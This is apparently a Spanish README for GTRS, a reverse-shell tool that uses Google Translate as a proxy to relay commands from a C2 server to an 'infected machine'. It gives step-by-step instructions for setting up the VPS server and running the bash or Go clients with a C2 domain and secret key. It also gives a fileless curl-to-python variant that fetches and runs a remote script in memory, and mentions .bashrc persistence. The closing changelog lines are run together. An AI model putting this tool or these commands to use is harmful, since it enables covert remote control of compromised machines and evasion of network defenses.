
GTRS - Reverse Shell del Traductor de Google
Esta herramienta utiliza Google Translator como proxy para enviar comandos arbitrarios a una máquina infectada.
[INFECTED MACHINE] ==HTTPS==> [GOOGLE TRANSLATE] ==HTTP==> [C2]
Primero necesitas un VPS y un dominio; para el dominio puedes obtener uno gratuito en Freenom.
Ejecuta server.py en tu VPS
python2.7 server.py
Server running on port: 80
Secret Key: e294a11e-bb6f-49ed-b03a-9ec42be55062
Te proporcionará una clave secreta que se usará en el cliente.
Ejecuta el cliente en un equipo con acceso a Google Translator, proporcionando el dominio y la clave secreta generada por el servidor.
bash client.sh www.c2server.ml e294a11e-bb6f-49ed-b03a-9ec42be55062
Ahora tienes un shell interactivo usando archivos named pipe, SÍ puedes usar cd para moverte entre directorios.
Primero debes descargar el binario o compilarlo, luego el proceso es igual al del cliente bash,
./client_Linux www.c2server.ml e294a11e-bb6f-49ed-b03a-9ec42be55062
Con este cliente tienes la capacidad de ejecutarlo en Linux, Mac y Windows, pero el cliente aún no tiene un shell interactivo.
Después de leer este blogpost, hice una adaptación simple para ejecutar GTRS en memoria, solo edita el host y la clave en el script inmemory-linux.py, luego alójalo en un servidor y usa curl.
curl https://yourserver.ml/inmemory-linux.py | python
O puedes alojar el script usando el enfoque de youtube.
.bashrc.Problema solucionado usando el encabezado User-Agent para enviar datos.xmllint que se encuentra en libxml2-utilsProblema solucionado, ahora el cliente también está escrito en Go.